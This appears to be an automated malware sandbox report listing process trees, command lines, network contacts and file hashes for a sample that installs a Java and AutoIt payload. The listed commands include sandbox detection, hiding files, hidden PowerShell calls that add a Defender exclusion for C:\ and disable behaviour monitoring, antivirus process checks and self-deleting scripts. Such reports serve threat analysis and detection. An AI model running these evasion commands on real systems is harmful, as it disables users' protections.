PID 1036 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp
PID 2392 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Windows\system32\cmd.exe
PID 2392 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Windows\system32\cmd.exe
PID 3436 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3436 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3436 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3436 wrote to memory of 4420 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Windows\system32\cmd.exe
PID 2392 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp C:\Windows\system32\cmd.exe
PID 4216 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4216 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4216 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 4216 wrote to memory of 3948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe

"C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp" /SL5="$50272,4595545,205824,C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" cmd /c wmic diskdrive get model | FINDSTR /I "Virtual VBOX VMware">ds.txt

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get model

C:\Windows\system32\findstr.exe

FINDSTR /I "Virtual VBOX VMware"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" cmd /c interim.cmd

C:\Windows\system32\attrib.exe

attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"

C:\Windows\system32\cmd.exe

cmd /c tar xf interim

C:\Windows\system32\tar.exe

tar xf interim

C:\Windows\system32\attrib.exe

attrib +s +h /D "C:\Users\Admin\AppData\Local\Temp\msdtadmin\*.*"

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe

".\231\231.exe"

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe

"C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\asm-all.jar;lib\commons-email.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Add-MpPreference -Force -ExclusionPath "C:\""' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe

Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command "Set-MpPreference -Force -DisableBehaviorMonitoring "' -Verb RunAs}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe

"C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe"

C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R63LS.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp" /SL5="$80272,10740751,812544,C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe"

C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe

"C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe" /VERYSILENT /NORESTART

C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3D6R0.tmp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.tmp" /SL5="$90272,10740751,812544,C:\Users\Admin\AppData\Local\Temp\MThiYWRhYjM4NDE2MWVkYWQ2MDhkYmYxMDQ1MTIyY2Y.exe" /VERYSILENT /NORESTART

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "wrsa.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "opssvc.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "avastui.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "avgui.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "nswscsvc.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH

C:\Windows\system32\find.exe

find /I "sophoshealth.exe"

C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe

"C:\Users\Admin\AppData\Local\acetiam\\AutoIt3.exe" "C:\Users\Admin\AppData\Local\acetiam\\grayhound1..a3x"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && AutoIt3.exe C:\ProgramData\\lgASHAd.a3x && del C:\ProgramData\\lgASHAd.a3x

C:\Windows\SysWOW64\PING.EXE

ping -n 5 127.0.0.1

C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe

AutoIt3.exe C:\ProgramData\\lgASHAd.a3x

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
DE 78.47.101.48:80 78.47.101.48 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 41.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 48.101.47.78.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
RU 89.23.96.126:80 89.23.96.126 tcp
US 8.8.8.8:53 126.96.23.89.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 89.23.96.126:80 89.23.96.126 tcp
DE 78.47.101.48:443 78.47.101.48 tcp
RU 89.23.96.126:80 89.23.96.126 tcp
RU 89.23.96.126:80 89.23.96.126 tcp
RU 45.141.86.82:15647 tcp
US 8.8.8.8:53 82.86.141.45.in-addr.arpa udp
RU 45.141.86.82:9000 45.141.86.82 tcp

Files

memory/3736-0-0x0000000000400000-0x000000000043C000-memory.dmp

memory/3736-2-0x0000000000401000-0x0000000000417000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-N8KO8.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp

MD5 2e5268d21ee1d98eccf3b34eec423da1
SHA1 8a2438cd614bb41e25840bd2d4093624340340c1
SHA256 16eb4e42a9368653bd9d53fe8bde815fe87c597239f36b662cc96dbc007200b7
SHA512 aad98865430deca874beff456d349e640caaf9969726f1b279995d4eff41efd77e422c43e739af245f7e7ab5e6f970b4b10a8ef40681621a419b533da002fe94

memory/2292-7-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-BPDC1.tmp\idp.dll

MD5 55c310c0319260d798757557ab3bf636
SHA1 0892eb7ed31d8bb20a56c6835990749011a2d8de
SHA256 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed
SHA512 e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57

memory/3736-29-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2292-30-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\interim.cmd

MD5 5eb56a3d2bf812380982b715d6c76e4b
SHA1 42e24481c1f1dd3f18d8396eec6570e2c05d17ce
SHA256 9008812fe85e22ae3e3c394568d449cb78d252a403c4950ed181007542acd23c
SHA512 8d21ab65128c9070d0f31a91561f65d3c3eb6d9c36d2ff73f7b80e4de63a18d14c8512d58da565919f95cd594e2df45762153ae216bc6cd1cefd53a8dd005cf2

memory/2292-174-0x0000000000400000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe

MD5 0f2614f9e5ce56e869691391776aae9e
SHA1 858e326195413db11adc894f10d16a2bd087ecef
SHA256 44dbf9913a950bfea77e8fceb3c15b802733a6a6c7942f6b6ee05d17afba521a
SHA512 80d7233a64d69c474bf8b46728801396c97c9089c64b26218d5bfad096cc39dbe9f67bf942aecbe721b5dc345bd99968b39da4fc20cd006c75c258cc2ec38de7

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe

MD5 48c96771106dbdd5d42bba3772e4b414
SHA1 e84749b99eb491e40a62ed2e92e4d7a790d09273
SHA256 a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22
SHA512 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

memory/3092-277-0x0000000000400000-0x0000000000415000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\i386\jvm.cfg

MD5 9fd47c1a487b79a12e90e7506469477b
SHA1 7814df0ff2ea1827c75dcd73844ca7f025998cc6
SHA256 a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e
SHA512 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\msvcr100.dll

MD5 bf38660a9125935658cfa3e53fdc7d65
SHA1 0b51fb415ec89848f339f8989d323bea722bfd70
SHA256 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
SHA512 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\client\jvm.dll

MD5 39c302fe0781e5af6d007e55f509606a
SHA1 23690a52e8c6578de6a7980bb78aae69d0f31780
SHA256 b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc
SHA512 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\verify.dll

MD5 de2167a880207bbf7464bcd1f8bc8657
SHA1 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7
SHA256 fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3
SHA512 bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\meta-index

MD5 91aa6ea7320140f30379f758d626e59d
SHA1 3be2febe28723b1033ccdaa110eaf59bbd6d1f96
SHA256 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4
SHA512 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\zip.dll

MD5 cb99b83bbc19cd0e1c2ec6031d0a80bc
SHA1 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd
SHA256 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec
SHA512 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\java.dll

MD5 73bd0b62b158c5a8d0ce92064600620d
SHA1 63c74250c17f75fe6356b649c484ad5936c3e871
SHA256 e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30
SHA512 eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\ext\meta-index

MD5 77abe2551c7a5931b70f78962ac5a3c7
SHA1 a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc
SHA256 c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4
SHA512 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\activation.jar

MD5 46a37512971d8eca81c3fcf245bf07d2
SHA1 485de3a253e23f645037828c07f1d7f1af40763a
SHA256 ae475120e9fcd99b4b00b38329bd61cdc5eb754eee03fe66c01f50e137724f99
SHA512 49119b0cc3af02700685a55c6f15e6d40643f81640e642b9ea39a59e18d542f8837d30b43b5be006ce1a98c8ec9729bb2165c0442978168f64caa2fc6e3cb93d

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-gui-ext.jar

MD5 6696368a09c7f8fed4ea92c4e5238cee
SHA1 f89c282e557d1207afd7158b82721c3d425736a7
SHA256 c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4
SHA512 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-json-ext.jar

MD5 fde38932b12fc063451af6613d4470cc
SHA1 bc08c114681a3afc05fb8c0470776c3eae2eefeb
SHA256 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830
SHA512 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-desktop-hotkey-ext.jar

MD5 22acc05e1efc1d4c5faa0359ce725d47
SHA1 458e7f911d024a3d786e76f256b017b0901f48f8
SHA256 c55c267d954ec9f24226780ee49fa7e1bc2baec3af6bfc0caa6cc1b49d8ca90c
SHA512 b11754f5337a73d317ae311fd4c20c0b548e1163107b741cc9e6d4d9027a8f99551e3184a83f9ad20098092e87ef1741c1e437058b7cac92727124589c303ef5

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-desktop-ext.jar

MD5 b50e2c75f5f0e1094e997de8a2a2d0ca
SHA1 d789eb689c091536ea6a01764bada387841264cb
SHA256 cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23
SHA512 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-core.jar

MD5 7e5e3d6d352025bd7f093c2d7f9b21ab
SHA1 ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57
SHA256 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a
SHA512 c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-app-framework.jar

MD5 0c8768cdeb3e894798f80465e0219c05
SHA1 c4da07ac93e4e547748ecc26b633d3db5b81ce47
SHA256 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669
SHA512 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jna.jar

MD5 8d536ddbe44d1500d262960891911f91
SHA1 fcc5b10cb812c41b00708e7b57baccc3aee5567c
SHA256 edc2a2c4f9b0b55fdc66aef3c9a9ddfff97e4b892842d4c0e1bc6eaff704abcb
SHA512 0ff97f158d1b1fbbef35813a1be2cc9f0c2321fa66e47af3276d3cb93178e668a652bac8a1aee82986dbf86e6db34518045eddfdd10ca827f3e4762faaa814f3

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jkeymaster.jar

MD5 21a017201cbb16ae0546069d4371f1c2
SHA1 9f1e8c9341a8a0c51299b961c4f6c7661c822756
SHA256 a2d68aaf08f15ff1c3b9b224641e8b4c35ee30b10f655d6420571b0429f19c87
SHA512 6c65740c17de72ba7b0df95aa29d095a1502f298924c63f364328f6fbb38920e92e0246d28a642f7c9fe3ab582341e607b0ae01515d470b4595d698ce81363d6

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jfoenix.jar

MD5 6316f84bc78d40b138dab1adc978ca5d
SHA1 b12ea05331ad89a9b09937367ebc20421f17b9ff
SHA256 d637e3326f87a173abd5f51ac98906a3237b9e511d07d31d6aafcf43f33dac17
SHA512 1cdca01ed9c2bc607207c8c51f4b532f4153e94b3846308332eccae25f9c5fddf8279e3063f44a75dd43d696eab0f9f340f9bf2f3ec805ab0f2f1de5135a426c

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\gson.jar

MD5 5134a2350f58890ffb9db0b40047195d
SHA1 751f548c85fa49f330cecbb1875893f971b33c4e
SHA256 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32
SHA512 c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\dn-php-sdk.jar

MD5 3e5e8cccff7ff343cbfe22588e569256
SHA1 66756daa182672bff27e453eed585325d8cc2a7a
SHA256 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4
SHA512 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\dn-compiled-module.jar

MD5 54449c8b4cd5c7b633a21b2cce60c950
SHA1 fb5c09f36f52ab97faefcf726d14504149f82829
SHA256 2f905c6458fb53d5e4d32ddf251c9bfe669054307031b294828f09ba33a97f81
SHA512 9161897d891d30085518ec92b4294f929ba261a0334e1a4ddfdebe106fd3b991a87b1ac14029265f293172102ae308a7c4b757f37cfedff6abcfc32d85baf85b

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\commons-email.jar

MD5 f045afea3cb27ead50b0c59fc3f0dffd
SHA1 c1a7133db9008fa1eae082e6158c3f4c128ec27e
SHA256 268253139a8936afa68909df8ced52a9d769665ee9373a60e19a93f254fd54b5
SHA512 0e2d2cbef9d4c19310748e37ad909e57aa37490a7dfd41557b1914857fe7235e434a6fdee00f663688941da3e70fe882b5c63df10ba8c7ad18936959f906722b

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\asm-all.jar

MD5 f5ad16c7f0338b541978b0430d51dc83
SHA1 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a
SHA256 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d
SHA512 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-gui-jfoenix-ext.jar

MD5 d093f94c050d5900795de8149cb84817
SHA1 54058dda5c9e66a22074590072c8a48559bba1fb
SHA256 4bec0794a0d69debe2f955bf495ea7c0858ad84cb0d2d549cacb82e70c060cba
SHA512 3faaa415fba5745298981014d0042e8e01850fccaac22f92469765fd8c56b920da877ff3138a629242d9c52e270e7e2ce89e7c69f6902859f48ea0359842e2fb

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\lib\ext\jfxrt.jar

MD5 042b3675517d6a637b95014523b1fd7d
SHA1 82161caf5f0a4112686e4889a9e207c7ba62a880
SHA256 a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22
SHA512 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-runtime.jar

MD5 d5ef47c915bef65a63d364f5cf7cd467
SHA1 f711f3846e144dddbfb31597c0c165ba8adf8d6b
SHA256 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6
SHA512 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-mail-ext.jar

MD5 405861c5544a92fb345ebca30dcaec2d
SHA1 f8fe5dcb597fff1bf6489f1283a0157be1a313c3
SHA256 fb206af4ddcc568eb1f7b38b7266be683167c95befef797b0965b4533647b17d
SHA512 f1330e5b39a2af8cf378172d9311a50b65aaa7d0c793b354efbcaa3c843bddeffb756a50f1cb9adaf974c3bb3fa6b5ef4b779e1efeeeb1b3946605f47053fe03

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-jsoup-ext.jar

MD5 d963210c02cd1825e967086827da8294
SHA1 26c4d004b5ffdb8f81de2d6b158a3f34819faf01
SHA256 7908145cf17301bedefd6e3af8c93e0320582c0562919ffb56cc21b7fd532b96
SHA512 756c21dc1a02d579f0e2ed39e5bedca5491087cdc28e3e96c8663a493bcfeeeeea44dc40681ec6341426dfa995883dbce11b76d1f921e043ae220399a9e554fb

memory/3432-341-0x0000000002540000-0x0000000002541000-memory.dmp

memory/3432-344-0x0000000002540000-0x0000000002541000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-xml-ext.jar

MD5 0a79304556a1289aa9e6213f574f3b08
SHA1 7ee3bde3b1777bf65d4f62ce33295556223a26cd
SHA256 434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79
SHA512 1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jsoup.jar

MD5 36145fee38e79b81035787f1be296a52
SHA1 33ee82e324f4b1e40167f3dc5e01234a1c5cab61
SHA256 6ebe6abd7775c10a49407ae22db45c840cd2cdaf715866a5b0b5af70941c3f4a
SHA512 3b00b07320831f075a6af9ac1863b8756fe4f99a1b4f2e53578dca17fdaf7bdb147279225045e9eeeba4898fe321cf5457832b8e6a1a5b71acff9a1c10392659

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-zip-ext.jar

MD5 20f6f88989e806d23c29686b090f6190
SHA1 1fdb9a66bb5ca587c05d3159829a8780bb66c87d
SHA256 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16
SHA512 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea

C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\lib\jphp-zend-ext.jar

